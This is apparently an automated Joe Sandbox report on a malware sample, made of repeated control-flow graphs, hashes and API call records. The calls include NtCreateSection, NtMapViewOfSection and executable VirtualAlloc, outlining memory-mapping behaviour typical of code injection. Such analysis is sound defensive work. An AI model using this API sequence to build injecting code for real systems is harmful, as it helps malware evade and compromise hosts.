                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 368 4029d1-4029d3 370 4029d6-402a0b call 40120e 368->370 371 4029ca-4029cf 368->371 380 402a0f-402a1d LdrLoadDll 370->380 371->370 381 402a26-402a71 call 40120e 380->381 382 402a1f 380->382 382->381
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 394 4029d5-402a0b call 40120e 402 402a0f-402a1d LdrLoadDll 394->402 403 402a26-402a71 call 40120e 402->403 404 402a1f 402->404 404->403
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 416 4029e2-402a0b call 40120e 423 402a0f-402a1d LdrLoadDll 416->423 424 402a26-402a71 call 40120e 423->424 425 402a1f 423->425 425->424
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 437 4029e9-402a0b call 40120e 442 402a0f-402a1d LdrLoadDll 437->442 443 402a26-402a71 call 40120e 442->443 444 402a1f 442->444 444->443
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 456 4029f9-402a1d call 40120e LdrLoadDll 463 402a26-402a71 call 40120e 456->463 464 402a1f 456->464 464->463
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009700F6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1711095054.0000000000969000.00000040.00000020.00020000.00000000.sdmp, Offset: 00969000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_969000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a6d89d35f318e5ccf49ac7613c972dc08f4f4ef56cda2dccc4f008c455b5ae29
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8112879A00208EFDB01DF98C985E98BBF5AF48350F05C0A4F9489B362D375EA90DF80
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1710705396.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1711305069.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2480000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8cdf4942245fb07499dfcbfde2d2b629970e6a449e81b357afbaf2dd344a87d1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A314AB6920609DFDB11DF99C880AAEBBF9FF48324F15504AD841A7310D771EA49CFA4
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1711095054.0000000000969000.00000040.00000020.00020000.00000000.sdmp, Offset: 00969000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_969000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0b9b58024153f0e4033e51e68a22d6bebe8bb1b4008a360b5f79c9e228d8a140
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92113C72340104AFDB54DE59ECA1FA673EAEB89360B2980A5ED08CB356D779E841C760
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1711305069.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2480000_ZRgv8wdMtR.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 34064763689ac3de6fc2931be55773beff4606bcf56ef1d504eadd77b2d196bf
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E01F272A306008FDF21EF20C905BBF33E5FB86306F0550A6D90A97381E370A8498B80
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:6.4%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:49%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:98
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
